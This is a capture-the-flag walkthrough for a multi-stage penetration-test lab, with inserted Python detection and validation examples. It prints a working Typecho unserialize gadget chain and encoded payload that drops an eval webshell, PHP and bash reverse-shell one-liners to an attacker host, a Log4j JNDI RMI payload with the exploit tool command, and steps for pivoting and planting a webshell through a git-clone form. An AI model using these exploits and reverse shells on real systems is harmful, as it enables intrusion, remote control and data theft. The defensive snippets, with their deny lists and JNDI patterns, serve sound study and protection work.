bugku Penetration Test 2 WP
The bugku Penetration Test 1 WP has the detailed frp and Proxifier configuration:
https://www.cnblogs.com/thebeastofwar/p/17744965.html
Note: this time there are three frp proxies, so make sure the proxy names and port numbers differ (for example frpc1.ini, frpc2.ini, frpc3.ini).
First a quick scan with fscan: nothing.
Then nmap on all ports: nothing.
Then back to the web side to check the fingerprint, and there is hope.
Found that this has an nday vulnerability.
exp.php
    <?php
    // Gadget chain for the Typecho install.php unserialize() nday: Typecho_Feed::__toString()
    // reads $item['author']->screenName, which goes through Typecho_Request::__get() and runs
    // each _filter callback on the value, so 'system' is called on the screenName string.
    class Typecho_Feed
    {
        const RSS1 = 'RSS 1.0';
        const RSS2 = 'RSS 2.0';
        const ATOM1 = 'ATOM 1.0';
        const DATE_RFC822 = 'r';
        const DATE_W3CDTF = 'c';
        const EOL = "\n";
        private $_type;
        private $_items;
        public function __construct(){
            $this->_type = $this::RSS2;
            $this->_items[0] = array(
                'title' => '1',
                'link' => '1',
                'date' => 1508895132,
                'category' => array(new Typecho_Request()),
                'author' => new Typecho_Request(),
            );
        }
    }
    class Typecho_Request
    {
        private $_params = array();
        private $_filter = array();
        public function __construct(){
            // screenName is the value passed to the filter; _filter[0] is the callback.
            $this->_params['screenName'] = 'echo "<?php phpinfo();@eval(\$_POST[1]);?>" > shell.php';
            $this->_filter[0] = 'system';
        }
    }
    // Top-level structure expected by install.php: adapter name plus table prefix.
    $exp = array(
        'adapter' => new Typecho_Feed(),
        'prefix' => 'typecho_'
    );
    echo base64_encode(serialize($exp));
    ?>
Then send the parameters:
GET: http://47.102.44.129/install.php?finish=a
POST:
__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjU1OiJlY2hvICI8P3BocCBwaHBpbmZvKCk7QGV2YWwoXCRfUE9TVFsxXSk7Pz4iID4gc2hlbGwucGhwIjt9czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfZmlsdGVyIjthOjE6e2k6MDtzOjY6InN5c3RlbSI7fX19czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NTU6ImVjaG8gIjw/cGhwIHBocGluZm8oKTtAZXZhbChcJF9QT1NUWzFdKTs/PiIgPiBzaGVsbC5waHAiO31zOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9maWx0ZXIiO2E6MTp7aTowO3M6Njoic3lzdGVtIjt9fX19fXM6NjoicHJlZml4IjtzOjg6InR5cGVjaG9fIjt9
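The root cause here is unserialize() on attacker-controlled POST data in install.php, so the detection point is the __typecho_config parameter itself: a legitimate value is a plain array of config strings, while the exploit carries serialized objects whose private _filter property names a shell function. The following is an added example, not code from the writeup or from the Typecho project. It implements a small parser for the PHP serialize() format, decodes a __typecho_config value, lists the classes it instantiates and flags any _filter entry that names a dangerous callable. The two sample values and the deny list are constructed for this example.

```python
import base64
import re

# Callables that must never appear in a Typecho_Request _filter list (constructed deny list).
DANGEROUS_CALLABLES = {"system", "exec", "shell_exec", "passthru", "popen", "proc_open", "assert"}


def parse_php_serialized(data, pos=0):
    """Parse one value of PHP serialize() output starting at data[pos].

    Returns (value, next_pos). Arrays become dicts, objects become dicts with a
    '__class__' key; private property names keep their "\\0Class\\0name" prefix.
    """
    tag = chr(data[pos])
    if tag == "N":                                   # N;
        return None, pos + 2
    if tag in ("i", "b", "d"):                      # i:123;  b:1;  d:1.5;
        end = data.index(b";", pos)
        raw = data[pos + 2:end]
        value = float(raw) if tag == "d" else int(raw)
        return (bool(value) if tag == "b" else value), end + 1
    if tag == "s":                                   # s:LEN:"bytes";
        colon = data.index(b":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2
        text = data[start:start + length].decode("utf-8", "replace")
        return text, start + length + 2
    if tag in ("a", "O"):                            # a:N:{k;v;...}  O:LEN:"Class":N:{...}
        colon = data.index(b":", pos + 2)
        if tag == "O":
            name_len = int(data[pos + 2:colon])
            name = data[colon + 2:colon + 2 + name_len].decode("utf-8", "replace")
            pos = colon + 2 + name_len + 2           # skip the closing quote and ':'
            colon = data.index(b":", pos)
            count = int(data[pos:colon])
            result = {"__class__": name}
        else:
            count = int(data[pos + 2:colon])
            result = {}
        pos = colon + 2                              # skip ':{'
        for _ in range(count):
            key, pos = parse_php_serialized(data, pos)
            value, pos = parse_php_serialized(data, pos)
            result[key] = value
        return result, pos + 1                       # skip '}'
    raise ValueError(f"unsupported type tag {tag!r} at offset {pos}")


def find_dangerous_filters(value, path="$"):
    """Walk a parsed structure and report objects whose private _filter array names a dangerous callable."""
    findings = []
    if not isinstance(value, dict):
        return findings
    cls = value.get("__class__")
    for key, child in value.items():
        if key == "__class__":
            continue
        child_path = f"{path}.{str(key).replace(chr(0), '~')}"
        if cls and str(key).endswith("\x00_filter") and isinstance(child, dict):
            for callback in child.values():
                if isinstance(callback, str) and callback.lower() in DANGEROUS_CALLABLES:
                    findings.append((child_path, cls, callback))
        findings.extend(find_dangerous_filters(child, child_path))
    return findings


def inspect_typecho_config(b64_value):
    """Decode a __typecho_config POST value; return (classes instantiated, dangerous filters found)."""
    raw = base64.b64decode(b64_value)
    value, _ = parse_php_serialized(raw)
    classes = sorted({m.decode() for m in re.findall(rb'O:\d+:"([^"]+)"', raw)})
    return classes, find_dangerous_filters(value)


# Constructed samples: a benign config and one carrying a Typecho_Request with a system() filter.
BENIGN_CONFIG = base64.b64encode(b'a:1:{s:6:"prefix";s:8:"typecho_";}').decode()
GADGET_CONFIG = base64.b64encode(
    b'a:2:{s:7:"adapter";O:15:"Typecho_Request":2:{'
    b's:24:"\x00Typecho_Request\x00_params";a:1:{s:10:"screenName";s:2:"id";}'
    b's:24:"\x00Typecho_Request\x00_filter";a:1:{i:0;s:6:"system";}}'
    b's:6:"prefix";s:8:"typecho_";}'
).decode()

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_CONFIG), ("gadget", GADGET_CONFIG)):
        classes, findings = inspect_typecho_config(sample)
        print(name, "classes:", classes, "findings:", findings)
```

Any object at all inside __typecho_config is already suspicious, since the install step only needs scalar settings; the _filter check just makes the alert specific. On the server side the fix is to remove install.php once installation is done and never call unserialize() on request data.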
Connect with AntSword.
flag1
Read the flag in the root directory.
There is no wget command.
PHP reverse shell
If the php -r method does not work
php -r '$sock=fsockopen("xxx",6666);system("/bin/bash -i <&3 >&3 2>&3");'
you can write
<?php $sock=fsockopen("xxx",6666);exec("/bin/bash -i <&3 >&3 2>&3");?>
to a file and then run php x.php
Improve shell interactivity
python3 -c 'import pty; pty.spawn("/bin/bash")'
flag2
Read the config.inc.php configuration file.
Generate a Godzilla shell.
Use Godzilla to upload fscan, check the internal network segment, and scan.
192.168.0.2:3306 open
192.168.0.2:80 open
192.168.0.1:80 open
192.168.0.3:80 open
192.168.0.1:22 open
[*] alive ports len is: 5
start vulscan
[*] WebTitle: http://192.168.0.1 code:200 len:3392 title:Harry's Blog
[*] WebTitle: http://192.168.0.2 code:200 len:3392 title:Harry's Blog
[*] WebTitle: http://192.168.0.3 code:200 len:4789 title:Bugku后台管理系统
[+] mysql:192.168.0.2:3306:root
socks5 proxy
Visit http://192.168.0.3/
Directory scanning found the source.zip source leak (the intended solution is to notice in Burp that the response has a source.zip field).
Do a simple code audit.
There are mainly just two files.
Log4j2CtfApplication.java
    package com.example.log4j2ctf;
    import org.springframework.boot.SpringApplication;
    import org.springframework.boot.autoconfigure.SpringBootApplication;

    @SpringBootApplication
    public class Log4j2CtfApplication {
        public static void main(String[] args) {
            SpringApplication.run(Log4j2CtfApplication.class, args);
        }
    }
DamnVulnerableLog4j.java
    package com.example.log4j2ctf.controller;
    import org.slf4j.Logger;
    import org.slf4j.LoggerFactory;
    import org.springframework.web.bind.annotation.PostMapping;
    import org.springframework.web.bind.annotation.RestController;
    import javax.servlet.http.HttpServletResponse;

    @RestController
    public class DamnVulnerableLog4j {
        private final Logger logger = LoggerFactory.getLogger(this.getClass());
        private int count = 0;

        @PostMapping("/login")
        public String login(String user, String pwd, HttpServletResponse response) {
            response.addHeader("Source", "/source.zip");
            /*
             *
             *
             */
            logger.info("用户登录失败,用户名不存在:" + user);
            return "用户名或密码错误,次数 " + (count++);
        }
    }
Now we need to consider three questions:
1. Which vulnerability to exploit (log4j, deduced from the file name; the logging in the file should also bring the 2021 log4j vulnerability to mind).
2. Knowing it is a log4j vulnerability, where is the injection point (the username input, because the code has logger.info("用户登录失败,用户名不存在:" + user); so log4j ldap/rmi injection can be concatenated there).
3. Knowing the injection point, log4j has many payloads; which one to use (the Spring Boot one, because pom.xml has Spring Boot configuration, so this should target the Spring Boot framework; a guess).
Then upload JNDI-Injection-Exploit-1.0.jar to the VPS.
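The three questions above are the attacker's view; the defender's equivalent is to spot the injected lookup before it reaches a vulnerable logger. The following is an added example, not code from the writeup or the CTF application. It scans recorded form bodies of POST /login for the Log4j lookup syntax (percent-decoding values first, since the raw body may carry ${ as %24%7B) and shows a server-side guard that refuses lookup syntax in the username before it is logged. The sample bodies, the 203.0.113.x addresses and the function names are constructed for this example.

```python
import re
from urllib.parse import parse_qs

# Matches the lookup prefix Log4j 2.x expands inside a logged message, e.g. ${jndi:rmi://host/obj}.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Constructed sample: form bodies of POST /login as a reverse proxy or WAF might record them.
SAMPLE_POST_BODIES = [
    "user=alice&pwd=secret",
    "user=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.5%3A1099%2Fobj%7D&pwd=x",
    "user=bob&pwd=${jndi:ldap://203.0.113.5:1389/a}",
]


def contains_jndi_lookup(text):
    """True if the text carries a ${jndi:...} lookup."""
    return JNDI_LOOKUP.search(text) is not None


def scan_post_bodies(bodies):
    """Return (body index, parameter name, decoded value) for every parameter carrying a lookup.

    Values are percent-decoded by parse_qs, so an encoded '${' is caught as well as a literal one,
    and every parameter is checked, not only the username the CTF code logs.
    """
    findings = []
    for i, body in enumerate(bodies):
        for name, values in parse_qs(body, keep_blank_values=True).items():
            for value in values:
                if contains_jndi_lookup(value):
                    findings.append((i, name, value))
    return findings


def reject_lookup_syntax(user):
    """Guard for the login handler: refuse any '${' in user input before it is logged.

    Defence in depth only. The actual fix is upgrading Log4j to 2.17.1 or later; the
    log4j2.formatMsgNoLookups setting is an incomplete stopgap for 2.10 to 2.14.1.
    """
    return "${" not in user


if __name__ == "__main__":
    for hit in scan_post_bodies(SAMPLE_POST_BODIES):
        print("lookup in body %d, parameter %s: %s" % hit)
```

Searching the application log itself is less reliable than inspecting the request: when the lookup resolves, what Log4j writes out is the resolved value rather than the original ${jndi:...} string.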
bash -i >& /dev/tcp/xxx/6666 0>&1
bash -c {echo,xxx}|{base64,-d}|{bash,-i}
java -jar JNDI-Injection-Exploit-1.0.jar -C "bash -c {echo,xxx}|{base64,-d}|{bash,-i}" -A "xxx"
Choose the springboot option.
payload: ${jndi:rmi://xxx:xxx/xxx}
Put the payload in the username field.
Then listen with nc.
Receive the reverse shell.
Root right from the start.
flag4
cat /flag
Read /start.sh.
flag5
Found that /root/flag also has a flag.
flag3
Global search for flag.
Found three flags in the environment variables.
ip address shows there is another network interface.
Use wget to download fscan, frpc and frpc.ini remotely.
Scan 192.168.1.0-255.
192.168.1.3:80 open
192.168.1.1:80 open
192.168.1.2:80 open
192.168.1.1:22 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://192.168.1.1 code:200 len:3392 title:Harry's Blog
[*] WebTitle: http://192.168.1.2 code:200 len:4789 title:Bugku后台管理系统
[*] WebTitle: http://192.168.1.3 code:200 len:524 title:乙公司Git仓库
已完成 3/4 [-] ssh 192.168.1.1:22 root P@ssw0rd! ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 3/4 [-] ssh 192.168.1.1:22 root Aa123123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 3/4 [-] ssh 192.168.1.1:22 admin admin123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 3/4 [-] ssh 192.168.1.1:22 admin Aa1234 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 4/4
[*] 扫描结束,耗时: 4m43.657692575s
http://192.168.1.3/
Enter https://github.com/bugku/BWVS.git; when clicking into it, found the flag.
flag6
flag7
Then I wanted to get a shell.
Guess: when a repository is entered, the server clones it directly to local disk; if the repository contains a webshell, will that get a shell directly?
Create a new repository yourself, configure SSH keys, turn off "keep my email address private", then first clone it locally.
git clone xxx
git add .
git commit -m "xxx"
git push
My repository: https://github.com/TheBeastofwar/webshell-repository
After getting a shell, read the source:
    <html>
    <head>
        <meta charset="utf-8">
        <title>乙公司Git仓库</title>
    </head>
    <body>
        <p>乙公司Git仓库</p>
        <form method="post">
            <label for="repourl">Repository’s clone URL</label><br>
            <input id="repourl" type="input" name="repourl" placeholder="https://github.com/bugku/BWVS.git" style="width: 400px;height: 30px;margin-bottom: 10px;margin-top: 10px;"><br/>
            <input type="submit" value="Submit" />
        </form>
        <p>注意:可以使用自己的服务器。</p>
        <?php
        if (isset($_REQUEST['repourl']) && !empty($_REQUEST['repourl'])) {
            $repourl = escapeshellarg($_REQUEST['repourl']);
            @chdir("/var/www/html/repos/");
            shell_exec("git clone --recursive $repourl");
            echo 'See your project at: <a href="/repos">Repos</a>';
        }
        ?>
    </body>
    </html>
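The escapeshellarg() call in this source does its job: the URL cannot break out of the shell command. The bug is elsewhere: any repository is accepted and the clone lands under /var/www/html/repos, which PHP serves, so a .php or .phtml file in the attacker's repository runs as soon as it is requested, which is exactly how the shell above was obtained. The following is an added example, not code from the writeup or the challenge, showing the two checks the form should have done: an allow-list validation of the clone URL (git also treats a value starting with "-" as an option, which escapeshellarg() does not prevent) and a listing of files that would execute if the clone were served from the document root. The allow list, the extension set and the sample inputs are constructed for this example.

```python
import posixpath
import re
from urllib.parse import urlsplit

# Constructed allow list: the only hosts this form should ever clone from.
ALLOWED_HOSTS = {"github.com"}
# Extensions a PHP-enabled web server would execute if the clone lands under the document root.
SCRIPT_EXTENSIONS = {".php", ".phtml", ".phar", ".php3", ".php5", ".phps"}
# Exactly /owner/repo.git, nothing else.
REPO_PATH = re.compile(r"/[A-Za-z0-9_.-]+/[A-Za-z0-9_.-]+\.git")


def validate_clone_url(url):
    """Return (ok, reason). Only https://<allowed host>/owner/repo.git passes.

    escapeshellarg() stops shell injection, but git itself accepts many transports and
    parses a leading '-' as an option, so the value must be validated before git sees it.
    """
    if not url or url.startswith("-"):
        return False, "empty or option-like value"
    parts = urlsplit(url)
    scheme = parts.scheme or "(none)"
    if parts.scheme != "https":
        return False, f"scheme {scheme!r} not allowed"
    if parts.hostname not in ALLOWED_HOSTS:
        return False, f"host {parts.hostname!r} not in allow list"
    if parts.username or parts.password or parts.query or parts.fragment:
        return False, "credentials, query or fragment not allowed"
    if not REPO_PATH.fullmatch(posixpath.normpath(parts.path)):
        return False, "path is not /owner/repo.git"
    return True, "ok"


def files_served_as_code(paths):
    """List repository files the web server would execute rather than serve as text.

    Cloning outside the document root (or disabling script execution for /repos) removes
    the problem entirely; this check is for the case where the files must be published.
    """
    return sorted(p for p in paths if posixpath.splitext(p)[1].lower() in SCRIPT_EXTENSIONS)


# Constructed sample inputs.
SAMPLE_URLS = [
    "https://github.com/bugku/BWVS.git",
    "http://github.com/bugku/BWVS.git",
    "https://github.com/a/../b.git",
    "-x",
    "https://example.org/a/b.git",
]
SAMPLE_TREE = ["index.html", "README.md", "shell.phtml", "src/app.PHP"]

if __name__ == "__main__":
    for candidate in SAMPLE_URLS:
        print(candidate, "->", validate_clone_url(candidate))
    print("would execute:", files_served_as_code(SAMPLE_TREE))
```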
Check the network segment.
Upload Godzilla's shell.phtml.
Then use Godzilla to upload fscan, frpc and frpc.ini.
fscan scan
(icmp) Target 10.10.0.3 is alive
(icmp) Target 10.10.0.2 is alive
(icmp) Target 10.10.0.1 is alive
[*] Icmp alive hosts len is: 3
10.10.0.1:80 open
10.10.0.2:80 open
10.10.0.1:22 open
10.10.0.3:21 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://10.10.0.2 code:200 len:524 title:乙公司Git仓库
[*] WebTitle: http://10.10.0.1 code:200 len:3368 title:Harry's Blog
已完成 2/4 [-] ssh 10.10.0.1:22 root qwe123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
Port 21 is open.
Look at the hint again.
Guess the FTP service username and password are guest/guest.
Configure proxychains.
proxychains ftp 10.10.0.3
flag8
get flag
flag9
cd /
get flag
Cleanup
Stop frpc and delete frpc.ini (it exposes my own VPS IP address).
ps -aux | grep frp > 1.txt
cat 1.txt
kill -9 xxx
Lessons learned:
In a reverse shell, if something hangs for a long time and you press Ctrl+C to get out, it exits the shell directly.